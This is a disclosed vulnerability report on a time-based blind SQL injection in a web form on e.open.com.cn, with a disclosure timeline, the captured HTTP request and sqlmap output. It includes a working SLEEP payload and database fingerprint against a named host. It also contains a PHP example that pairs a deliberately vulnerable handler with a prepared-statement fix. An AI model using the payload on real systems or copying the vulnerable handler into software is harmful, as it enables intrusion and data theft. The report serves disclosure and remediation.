Disclosure timeline:
2015-06-29: Details reported to the vendor, awaiting vendor handling
2015-06-30: Vendor confirmed; details visible to the vendor only
2015-07-10: Details disclosed to core white hats and relevant domain experts
2015-07-20: Details disclosed to regular white hats
2015-07-30: Details disclosed to intern white hats
2015-08-14: Details disclosed to the public
Injection point (the `style` parameter of the POST body):

POST /popu/data.php HTTP/1.1
Host: e.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://e.open.com.cn/ty.html
Content-Length: 471
Cookie: b_t_s=t235545127433x; up_page_stime_100200=1435545127497; up_beacon_vist_count_100200=1; b_t_s_100200=210c51ab-6f80-4d1a-be56-489b3a50f91a; up_first_date=2015-06-29; up_beacon_id_100200=210c51ab-6f80-4d1a-be56-489b3a50f91a-1435545127499; __utma=209232844.538313747.1435545135.1435545135.1435545135.1; __utmb=209232844.7.10.1435545135; __utmc=209232844; __utmz=209232844.1435545135.1.1.utmcsr=learn.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/login.aspx; b_t_s_100100=bc9a7bd2-6e88-4cbb-8cc7-0bc057c57c28; __utma=221648972.123858968.1435545865.1435545865.1435545865.1; __utmb=221648972.1.10.1435545865; __utmc=221648972; __utmz=221648972.1435545865.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

style=%E5%B8%8C%E6%9C%9B%E5%BC%80%E9%80%9A%E4%BD%93%E9%AA%8C%E5%B8%90%E5%8F%B7&username=111111&company=111&mobile=13852147411&phone=13852147411&email=234047006%40qq.com&qq=123123123&answer=%E6%95%B0%E5%AD%97%E5%8C%96%E6%A0%A1%E5%9B%AD%E4%B8%80%E4%BD%93%E5%8C%96%E7%B3%BB%E7%BB%9F%2C%E5%A5%A5%E9%B9%8F%E8%BF%9C%E7%A8%8B%E6%95%99%E5%8A%A1%E7%B3%BB%E7%BB%9F%2C%E8%80%83%E8%AF%95%E6%B5%8B%E8%AF%84%E4%BA%A7%E5%93%81%2C%E4%BC%81%E4%B8%9A%E5%9F%B9%E8%AE%AD%E5%B9%B3%E5%8F%B0%2C
sqlmap output:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: style (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: style=%E5%B8%8C%E6%9C%9B%E5%BC%80%E9%80%9A%E4%BD%93%E9%AA%8C%E5%B8%90%E5%8F%B7' AND (SELECT * FROM (SELECT(SLEEP(10)))NCBx) AND 'lBoP'='lBoP&username=111111&company=111&mobile=13852147411&phone=13852147411&email=234047006@qq.com&qq=123123123&answer=%E6%95%B0%E5%AD%97%E5%8C%96%E6%A0%A1%E5%9B%AD%E4%B8%80%E4%BD%93%E5%8C%96%E7%B3%BB%E7%BB%9F,%E5%A5%A5%E9%B9%8F%E8%BF%9C%E7%A8%8B%E6%95%99%E5%8A%A1%E7%B3%BB%E7%BB%9F,%E8%80%83%E8%AF%95%E6%B5%8B%E8%AF%84%E4%BA%A7%E5%93%81,%E4%BC%81%E4%B8%9A%E5%9F%B9%E8%AE%AD%E5%B9%B3%E5%8F%B0,
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.5
back-end DBMS: MySQL 5.0.12
current database: 'ecschool'
Fix suggestion: filter the relevant parameters.
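The report does not show the source of /popu/data.php, so the following is an added illustration in PHP of what "filter the relevant parameters" means in practice, written for this page and not taken from the vendor's code. It assumes a hypothetical `trial_requests` table in the `ecschool` database that sqlmap named, and shows the vulnerable shape (form fields concatenated into the SQL text, which is what lets a quote in `style` end the string literal and a `SLEEP()` delay the response) next to a hardened handler that validates input and binds every value through a prepared statement. The connection credentials are placeholders.

```php
<?php
// Added illustration, not the code of e.open.com.cn. The table name
// `trial_requests` and the column layout are assumptions; the field names
// match the POST body shown in the report.

function requestFields()
{
    return array('style', 'username', 'company', 'mobile', 'phone', 'email', 'qq', 'answer');
}

// Vulnerable shape: POST values interpolated directly into the SQL text.
// A single quote inside `style` closes the string literal and the rest of the
// value is parsed as SQL; a SLEEP() placed there delays the reply, which is the
// time-based blind signal sqlmap reported.
function saveRequestVulnerable(PDO $db, array $post)
{
    $fields = requestFields();
    $quoted = array();
    foreach ($fields as $f) {
        $quoted[] = "'" . (isset($post[$f]) ? $post[$f] : '') . "'";
    }
    $sql = 'INSERT INTO trial_requests (' . implode(', ', $fields) . ')'
         . ' VALUES (' . implode(', ', $quoted) . ')';
    return $db->exec($sql) !== false;
}

// Hardened form: check the shape of each value, then bind all of them as
// parameters so the database never treats user input as SQL.
function saveRequestSafe(PDO $db, array $post)
{
    $fields = requestFields();
    $values = array();
    foreach ($fields as $f) {
        $v = isset($post[$f]) ? trim((string) $post[$f]) : '';
        if (strlen($v) > 255) {
            return false;   // refuse oversized input rather than truncating silently
        }
        $values[] = $v;
    }
    // mobile and phone: digits only (an 11-digit mobile number, as in the report's request)
    if (!preg_match('/^[0-9]{11}$/', $values[3]) || !preg_match('/^[0-9]{0,20}$/', $values[4])) {
        return false;
    }
    if ($values[5] !== '' && filter_var($values[5], FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    $placeholders = implode(', ', array_fill(0, count($fields), '?'));
    $stmt = $db->prepare('INSERT INTO trial_requests (' . implode(', ', $fields) . ')'
                       . ' VALUES (' . $placeholders . ')');
    return $stmt->execute($values);
}

// Connection with native (non-emulated) prepared statements and exceptions on
// error, so a failed query is logged instead of silently returning false.
function connect()
{
    // Placeholder credentials; replace with the application's own.
    $db = new PDO('mysql:host=127.0.0.1;dbname=ecschool;charset=utf8', 'app_user', 'REPLACE_ME');
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $db;
}

if (php_sapi_name() !== 'cli') {
    $ok = saveRequestSafe(connect(), $_POST);
    header('Content-Type: application/json');
    echo json_encode(array('ok' => $ok));
}
```

The validation step is a filter in the sense the fix suggestion uses the word, but the property that actually closes the injection is the bound parameter: with `ATTR_EMULATE_PREPARES` off, the statement text is sent to MySQL once and the values travel separately, so no value can change the query's structure regardless of the quotes it contains. Escaping alone (for example `mysql_real_escape_string`, which PHP 5.3.5 still offers) is weaker because it has to be applied at every concatenation site and is easy to miss.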
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-06-30 10:24
Vendor reply: Developers have been required to remediate.
Latest status: None yet.